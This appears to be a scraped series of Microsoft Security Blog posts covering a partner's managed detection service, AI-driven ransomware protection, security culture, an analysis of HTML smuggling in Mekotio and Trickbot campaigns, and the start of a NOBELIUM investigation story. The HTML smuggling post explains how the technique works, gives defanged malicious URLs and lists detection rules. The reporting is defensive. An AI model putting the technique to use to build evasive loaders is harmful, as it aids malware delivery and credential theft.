As a Microsoft Advanced Threat Protection Specialization certified partner, Open Systems focuses on three critical pillars for their MDR solution: mission-driven processes, a mission-ready platform, and Microsoft-certified experts.

Because the stakes are so high, the service is run like NASA Mission Control, using mission-driven processes to deliver repeatable and predictable outcomes that ensure fast detection and remediation of threats. These mission-driven processes have been honed for over 20 years with scientific rigor to bridge IT and security silos for optimal performance and resilience against attack. This allows Open Systems to deliver outcomes not alerts, greater business value, and out-of-this-world customer satisfaction.

Complementing these mature processes is the mission-ready platform at the heart of Open Systems’ services. This cloud-native platform weaves security into the fabric of an organization’s infrastructure, eliminating the need to stitch together multiple-point security products and the associated complexity. Managed from a “single pane of glass,” the platform also helps organizations realize the full value of their Microsoft infrastructure and that of their existing Microsoft security products.

The company’s four globally distributed SOCs follow the sun, with experts working from Europe, the United States, and Asia. Each of Open Systems’ DevSecOps engineers and security analysts has completed 400 hours of hands-on training and passed rigorous certification testing before servicing customers. They are armed with machine learning-powered high fidelity detection leveraging Microsoft Sentinel runbooks to ensure they can detect threats and make critical decisions fast and accurately.

Leveraging Microsoft

Scalability and enabling customers to retain their data are key aspects of the MDR service, both of which are achieved with Microsoft Sentinel and Microsoft Azure Lighthouse. Open Systems engaged with Microsoft in the early days of Microsoft Sentinel, working with their product teams and early customers to create a solution that runs in the customer tenant. Microsoft Defender for Endpoint absorbs signals, then contains threats as part of the automated response. Open Systems also leverages Microsoft Sentinel’s SOAR capabilities by writing managed runbooks that automatically contain and shut down threats early.

The service uses Azure Lighthouse to operate things—run queries, integrate different log sources, and more. Credible threats are inspected by Open Systems’ engineers and co-managed as needed with the customer. In this way, Open Systems’ MDR service and Microsoft Security don’t just integrate, they feed off each other to deliver better results. As one of our customers put it:

“We’re experiencing exceptional support from Open Systems. They not only help us contain costs and manage Azure, but their engineers, adaptable SASE+ platform, and managed runbooks contain threats before they spread throughout the network,” said James Tsang, Systems Manager, College of Southern Nevada.

Managed security leads to $2.5 million in savings

A publicly traded clinical research organization came to Open Systems for help streamlining their security architecture. They wanted to move away from siloed third-party systems that created too much complexity, too many vulnerabilities, and drove up costs. They needed a cloud platform to provide the accessibility and service necessary to protect their offices worldwide and their hybrid and remote workers. Open Systems partnered with Microsoft and demonstrated how Microsoft 365 E5 and Microsoft Sentinel could work together to help improve the company’s compliance, data protection, and security posture.

The Open Systems team also identified opportunities to replace legacy monitoring tools with Microsoft Azure Monitor and consolidate compliance and security data onto Microsoft Azure Log Analytics, helping reduce the number of suppliers and reduce costs. Together with Microsoft, Open Systems performed a cloud readiness and economic assessment using the company’s real-world costs—learning that the Azure implementation would result in $2.5 million annual savings by eliminating existing applications and unnecessary data centers. Moreover, optimizing Microsoft 365 E5 eliminated the need for several of the company’s existing tools, resulting in additional annual savings of $400,000.

The Open Systems and Microsoft monitoring tools’ capabilities.

Figure 2: Azure Monitor.

MISA membership

Cybersecurity is a high-trust business: trust in technology, trust in services, and trust in the partnership you have with your security vendor. Most of Open Systems customers come to the company through word-of-mouth references; many customers have worked with the company for years. Open Systems joined the Microsoft Intelligent Security Association (MISA) in July 2020 as part of the managed security service providers (MSSP) pilot. Being a MISA member gives Open Systems customers trust that the company can integrate its technologies with their existing Microsoft products, both on-premises and in the cloud. Customers want leadership, and alignment with Microsoft solutions they are investing in. Some of the company’s other ‘wow’ moments since joining MISA include:

As Mandana Javaheri, Global Director, Cybersecurity Solutions Group at Microsoft Corp put it in Open Systems’ press release, “MISA members are the cybersecurity industry leaders, unified by the common goal of helping secure our customers by offering their own valuable expertise and making the association more effective as it expands.”

Learn more

Want to learn more? Check out Open Systems’ Managed Detection and Response solution in the Azure Marketplace or visit the Open Systems’ Microsoft Solutions page.

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 


16 strategies to reduce cybersecurity alert fatigue in your SOC, Innocent Wafula, Microsoft Security, Microsoft. 17 February 2021.

2Too many security tools can be as bad as too few, Taylor Armerding, Security Boulevard. 14 August 2020.

3Why ransomware attacks are on the rise — and what can be done to stop them, Lynsey Jeffery, Vignesh Ramachandran, PBS. 8 July 2021.

The post How Open Systems uses Microsoft tools to improve security maturity appeared first on Microsoft Security Blog.

AI-driven adaptive protection against human-operated ransomware

November 15th, 2021 No comments

In human-operated ransomware attacks, threat actors use predictable methods to enter a device but eventually rely on hands-on-keyboard activities to move inside a network. To fortify our existing cloud-delivered automated protection against complex attacks like human-operated ransomware, we developed a cloud-based machine learning system that, when queried by a device, intelligently predicts if it is at risk, then automatically issues a more aggressive blocking verdict to protect the device, thwarting an attacker’s next steps.

The data-driven decisions the system makes are based on extensive research and experimentation to maximize blocking effectiveness without impacting customer experience. Since the adaptive protection is AI-driven, the risk score given to a device is not only dependent on individual indicators but on a broad swath of patterns and features that the system uses to determine whether an attack is imminent or underway. This capability is suited in fighting against human-operated ransomware because even if attackers use an unknown or benign file or even a legitimate file or process, the system can help prevent the file or process from launching.

In a customer environment, the AI-driven adaptive protection feature was especially successful in helping prevent humans from entering the network by stopping the binary that would grant them access. By considering indicators that would otherwise be considered low priority for remediation, adaptive protection stopped the attack chain at an early stage such that the overall impact of the attack was significantly reduced. The threat turned out to be Cridex, a banking trojan commonly used for credential theft and data exfiltration, which are also key components in many cyberattacks including human-operated ransomware.

Microsoft Defender for Endpoint customers who have enabled cloud protection are already getting the benefits of this improvement on their devices (servers excluded)—no additional step required. While cloud-delivered protection is turned on by default, we encourage customers to check and ensure that it remains on. This backend enhancement can help prevent human-operated attacks and other sophisticated threats from progressing inside a network and give incident responders more time to analyze and remediate attacks when they do happen. Microsoft will continue to use data science techniques to enrich and develop machine learning algorithms used in Microsoft 365 Defender.

Seeing adaptive protection in action

At Microsoft, our data scientists are constantly researching and prototyping advanced AI techniques to battle ransomware attackers. One feature that has proven to be effective against these attacks is the new AI-driven adaptive protection, recently released to our enterprise customers.

Figure 1. How the AI-driven adaptive protection works. Note that the device risk scoring is done in real time by design and thus does not cause any latency.

The adaptive protection feature works on top of the existing robust cloud protection, which defends against threats through different next-generation technologies. Compared to the existing cloud protection level feature, which relies on admins to manually adjust the cloud protection level, the adaptive protection is smarter and faster. It can, when queried by a device, automatically ramp the aggressiveness of cloud-delivered blocking verdicts up or down based on real-time machine learning predictions, thus proactively protecting the device.

We can see the AI-driven adaptive protection in action in a case where the system blocked a certain file. Before the occurrence of this file on the device, there were suspicious behaviors observed on the device such as system code injection and task scheduling. These signals, among others, were all taken into consideration by the AI-driven adaptive protection’s intelligent cloud classifiers, and when the device was predicted as “at risk,” the cloud blocking aggressiveness was instantly ramped up. Owing to the increased aggressiveness, Microsoft Defender Antivirus detected and blocked this file. It’s more difficult by nature to detect and block new malware at first sight, so without the adaptive cloud protection capability, this file might not have been blocked on this customer’s device.

Later the file was determined as a variant of Cridex, which is commonly used for credential theft and data exfiltration, leading to these credentials and data being used by cybercriminals in later attacks. These behaviors are also key components in human-operated ransomware attacks, where early detection is critical to prevent further impact. We elaborate more on how the adaptive cloud protection can protect customers from human-operated ransomware attacks in the next sections.

Using machine learning to power adaptive cloud protection

For this feature to perform as we intended, we needed it to do two things quite well. One, we needed the system to accurately determine whether a device is at risk. Two, the system then needed to respond and adjust depending on the previous judgment or score.

Predicting whether a device is at risk

As devices come under attack, activities on a device often start as a small number of suspicious indicators that would not, in isolation, typically be surfaced as a malicious attack. However, when these signals are seen in sequence over time or in a cluster pattern, AI-driven protection can assess the state of a device at the arrival time of each new signal and can immediately adjust the risk score of the device accordingly. Example signals include previous malware encounters, threats, behavior events, and other relevant information.

If a device is incorrectly scored as not at risk when it is in fact at risk, the attacker could perform additional activities that might be more difficult for detection technologies to catch, for instance if the attacker steals credentials and uses them to move laterally. Conversely, if a device is incorrectly determined as at risk when it is not, then the customer experience suffers. To strike a balance, we needed to find an intelligent machine learning model that can give an accurate score and test that model vigorously.

The model we chose is a binary classifier with pattern recognition (specifically, frequent itemset mining) integrated. A study has shown that the co-occurrence or pattern is a stronger discriminator for these purposes rather than individual tokens, and that using co-occurrence increases the overall robustness of the model. To this end, we’ve included frequent patterns that commonly show up in the malicious samples as input features. To further increase the accuracy of the model (or the number of correct classifications over total predictions), only discriminative patterns were selected by excluding the patterns that have a small Jaccard similarity distance to the frequent patterns present in the benign samples.

The risk score for the device as calculated by the model at that point in time then determines the system’s next steps.

Adjusting cloud blocking aggressiveness automatically

If the risk score of the given device exceeds a certain threshold, cloud protection automatically switches to aggressive blocking. This level of blocking means that some processes or files that would not immediately be considered malicious might also be blocked given that the device is at risk, and they are likely to have been used maliciously. Both the risk score threshold and the switch to aggressive mode are data-driven decisions based on intensive research and experiments to maximize blocking effectiveness without impacting customer experience.

Furthermore, since the risk of a device is scored and refreshed in real time, the cloud immediately ramps down the aggressiveness right after the device is deemed to be no longer at risk. Therefore, we can make sure that this AI-driven adaptive protection feature won’t cause unnecessary false positives or disrupt customer experience.

Delivering contextual and personalized protection

The responsiveness of the blocking mechanism to the real-time risk score computation in the cloud assures that the system makes better-informed decisions, resulting in contextual or stateful blocking in devices. This level of protection customization is such that the protection experience on each device is different—even for the same file or behavior.

For instance, process A can be allowed on a device that has a low risk score, but process A can be blocked and alerted on a potentially risky device. This “personalization” is beneficial for customers because they are less likely to contract false positives or false negatives, unlike machine learning models trained on a dataset that is a mix of every device. Essentially, each device receives a level of protection that is tailored to it.

Adaptive cloud machine learning against human-operated ransomware

AI-driven adaptive protection has a wide range of use cases and tremendous potential value. Its application in human-operated ransomware prevention has been particularly successful. Human-operated ransomware attack chains usually follow specific patterns, starting with campaigns to distribute malicious files, then using techniques such as lateral movement for credential theft and data exfiltration, and finally deploying and activating ransomware payloads to encrypt files on the device and display a ransom note.

However, since threat actors react and adjust to specific findings in the environment, they are able to move fast and use a variety of alternatives to get to their next steps. This makes it challenging for incident responders to quickly determine whether an attack is underway and how to stop the attackers. Our adaptive protection, however, can pick up traces of attacker activity that occur before the actual encryption of files. These data are all collected by our machine learning algorithm and used as evidence to evaluate risk. When the system determines that the current device is compromised or at risk, aggressive cloud blocking kicks in instantly.

Detecting and blocking abuse of legitimate processes or files

In the hands-on-keyboard phase of human-operated ransomware attacks, attackers often use legitimate processes or files for their succeeding steps. For example, network enumeration is a benign behavior by nature, but when it is observed on a device that is determined to be compromised, the likelihood that attackers are performing reconnaissance activities and identifying targets is greater. Adaptive protection can intelligently block network enumeration behavior on risky devices to stop the attack chain and prevent further attacks.

Detecting and blocking ransomware loaders

Ransomware loaders refer to a set of tools or commodity malware that are usually used in the initial and intermediate stages of a ransomware attack. For example, Ryuk is delivered through banking trojan infections like Trickbot. If Trickbot infections go undetected, attackers may be able to move laterally and gain privilege on critical accounts, leading to destructive outcomes.

Known ransomware loaders are fairly easy to detect, so attackers usually make slight changes to the file to evade file signature matching. They then distribute many versions of the file so they can increase the chances that at least one will not be blocked. Due to their polymorphic nature, these files can sometimes be missed by traditional approaches to malware detection. However, with real-time knowledge of the device state, adaptive cloud machine learning significantly reduces the chance of missing them.

Stopping ransomware payloads

Hypothetically, in attacks where early to mid-stage attack activities are not detected and blocked, AI-driven adaptive protection can still demonstrate huge value when it comes to the final ransomware payload. Given the device is already compromised, our AI-driven adaptive protection system can easily and automatically switch to the most aggressive mode and block the actual ransomware payloads, preventing important files and data from being encrypted so attackers won’t be able to demand ransom for them.

Smarter, faster protection from the cloud

With the AI-driven adaptive protection, Microsoft Defender for Endpoint can adjust the aggressiveness in real time according to the device state, buy security operations centers more time when incidents happen, and potentially stop an attack chain from the beginning. With the wide coverage and high blocking quality of this feature, we believe it will benefit all enterprise customers and further enhance next-generation of AI-powered protection.

The AI-driven adaptive protection feature in Microsoft Defender for Endpoint is just one of the many different AI layers that support our threat intelligence, which strengthen our ability to detect and protect against security threats. More threat data increases the quality of signals analyzed by Microsoft 365 Defender as it provides cross-domain defense against costly attacks like human-operated ransomware.

 

Microsoft 365 Defender Research Team

The post AI-driven adaptive protection against human-operated ransomware appeared first on Microsoft Security Blog.

How to assess and improve the security culture of your business

November 11th, 2021 No comments

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest Voice of the Community blog series post, Microsoft Security Product Marketing Manager Natalia Godyla talks with Cygenta Co-founder and Co-Chief Executive Officer Dr. Jessica Barker, author of “Confident Cyber Security: How to Get Started in Cyber Security and Futureproof Your Career” and co-author of “Cybersecurity ABCs: Delivering awareness, behaviors and culture change.” In this blog post, Jessica talks about how to build a security culture.

Natalia: How are most organizations doing? What is the state of cybersecurity culture?

Jessica: It varies—a lot of it comes down to resourcing and the emphasis placed on security from the leadership level. It can also come down to the experiences of the security team, security leadership, and the organization in terms of security incidents or near-misses. We’ve seen a lot of improvement in recent years, and that’s largely because there’s more awareness among leaders that security culture is important. Just 5 years ago, but particularly 10 years ago, there was very little discussion around culture and security culture.

Every year, we ask ClubCISO, a private group for senior information security professionals and security leaders, about security. For the last three years, they said security culture is their number one hot topic for the year ahead. They even said it in March 2021, tying with cloud. When I think about the year that cloud has had and the forced digital transformation many organizations have been through, it speaks volumes that security culture is as important of a priority as securely moving to the cloud.

Natalia: What does a cybersecurity culture assessment entail?

Jessica: In a cybersecurity culture assessment, we listen to the organization and the people who work there and understand security assumptions. When I speak to people about security culture, there’s often this idea that it is about how people behave, and that if we collect metrics around phishing, for example, it will tell us about the security culture. However, that will tell us something superficial. It’ll tell us what people are doing, not why they’re doing it.

Understanding the “why” is absolutely crucial because that’s your point of influence to change behavior. The “why” helps in understanding underlying assumptions and determining what you can do if there are gaps between what the security team wants and what people are doing.

The first stage is to understand the organizational culture, mission, and values and review the cultural symbols in the organization, including the branding, training, and messaging. Then, we run surveys, focus groups, and one-on-one interviews to encourage conversation, facilitate discussion, and understand what’s happening on a day-to-day basis, and most importantly, why.

Natalia: What are the indicators that a company needs a cybersecurity culture assessment?

Jessica: One prompt for most of our clients is that they feel like they need to do more to manage human risk, but they don’t know what. There may be incidents or near-misses. There may be indications around phishing or how people are managing passwords. There may be behavioral indicators—what they want from the people in the organization doesn’t match reality. Another key prompt is not understanding why their current culture isn’t developing in the way that they would want. Often, the organizations will have tried to deal with this in one way or another through awareness-raising, and there’s frustration because they’re telling people what to do, and they’re still not doing it. It takes a level of maturity, and it often takes organizations that aspire to be people-centric, to help their workforce be more security-conscious.

We measure security culture by gathering a lot of qualitative data to understand why people are doing what they’re doing. It goes back to the classic “start with why,” and then crunching numbers from surveys. We use grounded theory to qualify the data we get back. We immerse ourselves in that data and identify patterns. We also use anonymous quotes, comments, and keywords from workshops, focus groups, and one-on-one interviews to bring that story to life.

Natalia: What are typical challenges to establishing a positive security culture?

Jessica: I’m working with a financial services client that has a very positive organizational culture and lives by their values. But there have been challenges around security culture in this organization for many reasons, including fast digital transformation and growth. It’s taken them until this year to understand what a security culture means for their organization.

Because the people who work there felt loyalty to the organization, they wanted to behave in a secure way. They understood the importance of it, but there were blockers, including a lack of communication on why certain security controls were in place. It’s an entrepreneurial organization that moves quickly, so there were underlying cultural influences encouraging people to behave in less secure ways while prioritizing productivity. We’ve been undertaking a program to help the security team better communicate the “why,” and the organization has been receptive to it.

It’s also very hard to change behavior if the security leadership or organizational leadership team is not on board. Another consideration is the perception of a just culture. If somebody clicks a malicious link or makes a mistake, do they feel that they can put their hand up and report it without being unduly blamed? If people have a perception that the culture is about retribution and “pointing the finger,” that’s damaging to security culture.

Natalia: What’s the biggest mistake organizations make when trying to build and foster a security culture?

Jessica: To try to build a security culture that is not aligned with the business culture. One organization I worked with a few years ago was a very positive and people-centric healthcare organization. They were always seeking to say, “Yes,” to people in their wider organizational culture, but the security team was pushing a security culture that said, “No,” and was perceived as the “Department of No,” like many security teams. That’s a really common problem because the organizational culture will always win out, and if you try and bolt on a security culture that runs against the wider organization, it won’t work.

Often, the organizational culture of a company is not prepared to build a positive cybersecurity culture, and change requires patience. It’s a slow journey. That kind of client isn’t ready for a security culture assessment, so the work focuses on influencing the senior leadership to show them the importance of security culture. When organizations want a security culture assessment, that’s when they’re ready for it.

Natalia: How does the psychological well-being of the security team impact the security culture?

Jessica: At one organization, there was a lack of communication around security. The security team was so stressed, burnt-out, busy, and overworked that they didn’t have time to engage with their colleagues in the rest of the business. It led to the impression that the security team was not friendly or approachable, and it created a barrier to a positive security culture. Taking care of the well-being of the security function is fundamental.

To immediately improve the well-being of their team, managers can talk about the issues. If you’re comfortable doing so, this can include talking about your own mental well-being or acknowledging burnout stress and impostor syndrome. These are real issues in the industry, and it can be a relief for people to hear that they’re not alone and to have this safe space. It makes everyone feel more comfortable saying, “Hey, I need a day off for my mental health.” Mental health days are crucial in organizations, but leadership must show that they’re a priority.

Natalia: Besides an assessment, how can security teams improve their understanding of human risk?

Jessica: Behavioral economics, neuroscience, and psychology are all disciplines that can teach us about the human side of security and security culture. I’d recommend books like “Nudge,” “Thinking Fast and Slow”, and the work of Tali Sharot, a neuroscientist, whose work on the optimism bias is very relevant to security. There’s also a lot of great work being done in academia on security culture—papers and research that are advancing the field. It was interesting as well to see this year that Verizon did a shout-out to security culture for the first time in their data breach investigation report. Security culture is going more mainstream and is now higher up on the agenda in the security profession.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How to assess and improve the security culture of your business appeared first on Microsoft Security Blog.

HTML smuggling surges: Highly evasive loader technique increasingly used in banking malware, targeted attacks

November 11th, 2021 No comments

HTML smuggling, a highly evasive malware delivery technique that leverages legitimate HTML5 and JavaScript features, is increasingly used in email campaigns that deploy banking malware, remote access Trojans (RATs), and other payloads related to targeted attacks. Notably, this technique was observed in a spear-phishing campaign from the threat actor NOBELIUM in May. More recently, we have also seen this technique deliver the banking Trojan Mekotio, as well as AsyncRAT/NJRAT and Trickbot, malware that attackers utilize to gain control of affected devices and deliver ransomware payloads and other threats.

As the name suggests, HTML smuggling lets an attacker “smuggle” an encoded malicious script within a specially crafted HTML attachment or web page. When a target user opens the HTML in their web browser, the browser decodes the malicious script, which, in turn, assembles the payload on the host device. Thus, instead of having a malicious executable pass directly through a network, the attacker builds the malware locally behind a firewall.

Diagram showing typical attack chain of HTML smuggling

Figure 1. HTML smuggling overview

This technique is highly evasive because it could bypass standard perimeter security controls, such as web proxies and email gateways, that often only check for suspicious attachments (for example, EXE, ZIP, or DOCX) or traffic based on signatures and patterns. Because the malicious files are created only after the HTML file is loaded on the endpoint through the browser, what some protection solutions only see at the onset are benign HTML and JavaScript traffic, which can also be obfuscated to further hide their true purpose.

Threats that use HTML smuggling bank on the legitimate uses of HTML and JavaScript in daily business operations in their attempt to stay hidden and relevant, as well as challenge organizations’ conventional mitigation procedures. For example, disabling JavaScript could mitigate HTML smuggling created using JavaScript Blobs. However, JavaScript is used to render business-related and other legitimate web pages. In addition, there are multiple ways to implement HTML smuggling through obfuscation and numerous ways of coding JavaScript, making the said technique highly evasive against content inspection. Therefore, organizations need a true “defense in depth” strategy and a multi-layered security solution that inspects email delivery, network activity, endpoint behavior, and follow-on attacker activities.

The surge in the use of HTML smuggling in email campaigns is another example of how attackers keep refining specific components of their attacks by integrating highly evasive techniques. Microsoft Defender for Office 365 stops such attacks at the onset using dynamic protection technologies, including machine learning and sandboxing, to detect and block HTML-smuggling links and attachments. Email threat signals from Defender for Office 365 also feed into Microsoft 365 Defender, which provides advanced protection on each domain—email and data, endpoints, identities, and cloud apps—and correlates threat data from these domains to surface evasive, sophisticated threats. This provides organizations with comprehensive and coordinated defense against the end-to-end attack chain.

This blog entry details how HTML smuggling works, provides recent examples of threats and targeted attack campaigns that use it, and enumerates mitigation steps and protection guidance.

How HTML smuggling works

HTML smuggling uses legitimate features of HTML5 and JavaScript, which are both supported by all modern browsers, to generate malicious files behind the firewall. Specifically, HTML smuggling leverages the HTML5 “download” attribute for anchor tags, as well as the creation and use of a JavaScript Blob to put together the payload downloaded into an affected device.

In HTML5, when a user clicks a link, the “download” attribute lets an HTML file automatically download a file referenced in the “href” tag. For example, the code below instructs the browser to download “malicious.docx” from its location and save it into the device as “safe.docx”:

Screenshot of code for download of document

The anchor tag and a file’s “download” attribute also have their equivalents in JavaScript code, as seen below:

Screenshot of code for download attribute in JavaScript

The use of JavaScript Blobs adds to the “smuggling” aspect of the technique. A JavaScript Blob stores the encoded data of a file, which is then decoded when passed to a JavaScript API that expects a URL. This means that instead of providing a link to an actual file that a user must manually click to download, the said file can be automatically downloaded and constructed locally on the device using JavaScript codes like the ones below:

Screenshot of code for automatic download

Today’s attacks use HTML smuggling in two ways: the link to an HTML smuggling page is included within the email message, or the page itself is included as an attachment. The following section provides examples of actual threats we have recently seen using either of these methods.

Real-world examples of threats using HTML smuggling

HTML smuggling has been used in banking malware campaigns, notably attacks attributed to DEV-0238 (also known as Mekotio) and DEV-0253 (also known as Ousaban), targeting Brazil, Mexico, Spain, Peru, and Portugal. In one of the Mekotio campaigns we’ve observed, attackers sent emails with a malicious link, as shown in the image below.

Screenshot of email with malicious link

Figure 2. Sample email used in a Mekotio campaign. Clicking the link starts the HTML smuggling technique.

Diagram showing attack chain of Mekotio campaign using the HTML smuggling technique

Figure 3. Threat behavior observed in the Mekotio campaign

In this campaign, a malicious website, hxxp://poocardy[.]net/diretorio/, is used to implement the HTML smuggling technique and drop the malicious downloader file. The image below shows an HTML smuggling page when rendered on the browser.

Screenshot of code of HTML smuggling page

Figure 4. HTML smuggling page of the Mekotio campaign. Note how the “href” tag references a JavaScript Blob with an octet/stream type to download the malicious ZIP file.

It should be noted that this attack attempt relies on social engineering and user interaction to succeed. When a user clicks the emailed hyperlink, the HTML page drops a ZIP file embedded with an obfuscated JavaScript file.

Screenshot of HTML code for dropping ZIP file

Figure 5. ZIP file with an obfuscated JavaScript file

When the user opens the ZIP file and executes the JavaScript, the said script connects to hxxps://malparque[.]org/rest/restfuch[.]png and downloads another ZIP file that masquerades as a PNG file. This second ZIP file contains the following files related to DAEMON Tools:

  • sptdintf.dll – This is a legitimate file. Various virtual disc applications, including DAEMON Tools and Alcohol 120%, use this dynamic-link library (DLL) file.
  • imgengine.dll – This is a malicious file that is either Themida-packed or VMProtected for obfuscation. It accesses geolocation information of the target and attempts credential theft and keylogging.
  • An executable file with a random name, which is a renamed legitimate file “Disc Soft Bus Service Pro.” This legitimate file is part of DAEMON Tools Pro and loads both DLLs.

Finally, once the user runs the primary executable (the renamed legitimate file), it launches and loads the malicious DLL via DLL sideloading. As previously mentioned, this DLL file is attributed to Mekotio, a malware family of banking Trojans typically deployed on Windows systems that have targeted Latin American industries since the latter half of 2016.

HTML smuggling in targeted attacks

Beyond banking malware campaigns, various cyberattacks—including more sophisticated, targeted ones—incorporate HTML smuggling in their arsenal. Such adoption shows how tactics, techniques, and procedures (TTPs) trickle down from cybercrime gangs to malicious threat actors and vice versa. It also reinforces the current state of the underground economy, where such TTPs get commoditized when deemed effective.

For example, in May, Microsoft Threat Intelligence Center (MSTIC) published a detailed analysis of a new sophisticated email attack from NOBELIUM. MSTIC noted that the spear-phishing email used in that campaign contained an HTML file attachment, which, when opened by the targeted user, uses HTML smuggling to download the main payload on the device.

Since then, other malicious actors appeared to have followed NOBELIUM’s suit and adopted the technique for their own campaigns. Between July and August, open-source intelligence (OSINT) community signals showed an uptick in HTML smuggling in campaigns that deliver remote access Trojans (RATs) such as AsyncRAT/NJRAT.

In September, we saw an email campaign that leverages HTML smuggling to deliver Trickbot. Microsoft attributes this Trickbot campaign to an emerging, financially motivated cybercriminal group we’re tracking as DEV-0193.

In the said campaign, the attacker sends a specially crafted HTML page as an attachment to an email message purporting to be a business report.

Screenshot of HTML page attached in a email used in a Trickbot campaign

Figure 6. HTML smuggling page attached in a Trickbot spear-phishing campaign

When the target recipient opens the HTML attachment in a web browser, it constructs a JavaScript file and saves the said file in the device’s default Downloads folder. As an added detection-evasion technique against endpoint security controls, the created JavaScript file is password-protected. Therefore, the user must type the password indicated in the original HTML attachment to open it.

Screenshots of HTML page and the JavaScript downloader built in the browser

Figure 7. HTML attachment constructs a password-protected downloader JavaScript in the browser

Once the user executes the JavaScript, it initiates a Base64-encoded PowerShell command, which then calls back to the attacker’s servers to download Trickbot.

Attack chain diagram of Trickbot campaign using HTML smuggling technique

Figure 8. HTML smuggling attack chain in the Trickbot spear-phishing campaign

Based on our investigations, DEV-0193 targets organizations primarily in the health and education industries, and works closely with ransomware operators, such as those behind the infamous Ryuk ransomware. After compromising an organization, this group acts as a fundamental pivot point and enabler for follow-on ransomware attacks. They also often sell unauthorized access to the said operators. Thus, once this group compromises an environment, it is highly likely that a ransomware attack will follow.

Defending against the wide range of threats that use HTML smuggling

HTML smuggling presents challenges to traditional security solutions. Effectively defending against this stealthy technique requires true defense in depth. It is always better to thwart an attack early in the attack chain—at the email gateway and web filtering level. If the threat manages to fall through the cracks of perimeter security and is delivered to a host machine, then endpoint protection controls should be able to prevent execution.

Microsoft 365 Defender uses multiple layers of dynamic protection technologies, including machine learning-based protection, to defend against malware threats and other attacks that use HTML smuggling at various levels. It correlates threat data from email, endpoints, identities, and cloud apps, providing in-depth and coordinated threat defense. All of these are backed by threat experts who continuously monitor the threat landscape for new attacker tools and techniques.

Microsoft Defender for Office 365 inspects attachments and links in emails to detect and alert on HTML smuggling attempts. Over the past six months, Microsoft blocked thousands of HTML smuggling links and attachments. The timeline graphs below show a spike in HTML smuggling attempts in June and July.

Graph showing spike of HTML smuggling links

Figure 9. HTML smuggling links detected and blocked

Graph showing spike of HTML smuggling attachment

Figure 10. HTML smuggling attachments detected and blocked

Safe Links and Safe Attachments provide real-time protection against HTML smuggling and other email threats by utilizing a virtual environment to check links and attachments in email messages before they are delivered to recipients. Thousands of suspicious behavioral attributes are detected and analyzed in emails to determine a phishing attempt. For example, behavioral rules that check for the following have proven successful in detecting malware-smuggling HTML attachments:

  • An attached ZIP file contains JavaScript
  • An attachment is password-protected
  • An HTML file contains a suspicious script code
  • An HTML file decodes a Base64 code or obfuscates a JavaScript

Through automated and threat expert analyses, existing rules are modified, and new ones are added daily.

On endpoints, attack surface reduction rules block or audit activity associated with HTML smuggling. The following rules can help:

  • Block JavaScript or VBScript from launching downloaded executable content
  • Block execution of potentially obfuscated scripts
  • Block executable files from running unless they meet a prevalence, age, or trusted list criterion

Endpoint protection platform (EPP) and endpoint detection and response (EDR) capabilities detect malicious files, malicious behavior, and other related events before and after execution. Advanced hunting, meanwhile, lets defenders create custom detections to proactively find related threats.

Defenders can also apply the following mitigations to reduce the impact of threats that utilize HTML smuggling:

  • Prevent JavaScript codes from executing automatically by changing file associations for .js and .jse files.
    • Create new Open With parameters in the Group Policy Management Console under User Configuration > Preferences > Control Panel Settings > Folder Options.
    • Create parameters for .jse and .js file extensions, associating them with notepad.exe or another text editor.
  • Check Office 365 email filtering settings to ensure they block spoofed emails, spam, and emails with malware. Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Office 365 to recheck links on click and neutralize malicious messages that have already been delivered in response to newly acquired threat intelligence.
  • Check the perimeter firewall and proxy to restrict servers from making arbitrary connections to the internet to browse or download files. Such restrictions help inhibit malware downloads and command and control (C2) activity.
  • Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites. Turn on network protection to block connections to malicious domains and IP addresses.
  • Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • Educate users about preventing malware infections. Encourage users to practice good credential hygiene—limit the use of accounts with local or domain admin privileges and turn on Microsoft Defender Firewall to prevent malware infection and stifle propagation.

Learn how you can stop attacks through automated, cross-domain security with Microsoft 365 Defender.

 

Microsoft 365 Defender Threat Intelligence Team

The post HTML smuggling surges: Highly evasive loader technique increasingly used in banking malware, targeted attacks appeared first on Microsoft Security Blog.

The hunt for NOBELIUM, the most sophisticated nation-state attack in history

November 10th, 2021 No comments

This is the second in a four-part blog series on the NOBELIUM nation-state cyberattack. In December 2020, Microsoft began sharing details with the world about what became known as the most sophisticated nation-state cyberattack in history. Microsoft’s four-part video series “Decoding NOBELIUM” pulls the curtain back on the NOBELUM incident and how world-class threat hunters from Microsoft and around the industry came together to take on the most sophisticated nation-state attack in history. In this second post, we’ll explore the investigation in the second episode of the docuseries. 

The threat hunters had but weeks to unravel a global attack that had been planned and executed by an advanced adversary for over a year. The early days of a cyberattack investigation can feel like joining a high-stakes chess match after your opponent has already made a series of moves. You must figure out what your adversary has done while anticipating their next step, and launching a counterplay—all simultaneously. Instead of on a chessboard, your clues are found in the code, logs, and responses to your counterattacks. In the case of the NOBELIUM nation-state attack, this was a highly skilled chess player, but we came together as a company and as an industry to take on this shared adversary. This all started when one security company, Mandiant (formerly known as FireEye), spotted an anomaly in its own environment and shared the evidence with Microsoft for additional analysis, but this story would eventually involve thousands of defenders across the industry to uncover the full picture and help protect organizations.

As explained in our first post in this series, How nation-state attackers like NOBELIUM are changing cybersecurity, nation-state attacks are malicious cyberattacks that originate from a particular country and are an attempt to further that country’s interests. The nation-state attack from NOBELIUM, a Russia-sponsored group of hackers, is widely recognized as the most sophisticated in history. The group gained access to multiple enterprises before their actions were detected. This second episode of “Decoding NOBELIUM” explores how the group was detected and how defenders responded in the weeks that followed.

How was NOBELIUM detected?

It was late November 2020 when a security analyst at cybersecurity company Mandiant detected something unusual in its environment. While reviewing sign-in logs for the previous day, he noticed an event for a user with a different registered device. Intuition told him something was off so he called the user to ask if they’d registered a new device. The answer would set off an unprecedented, industry-wide hunt to catch a cybercriminal. The user said, “No.”

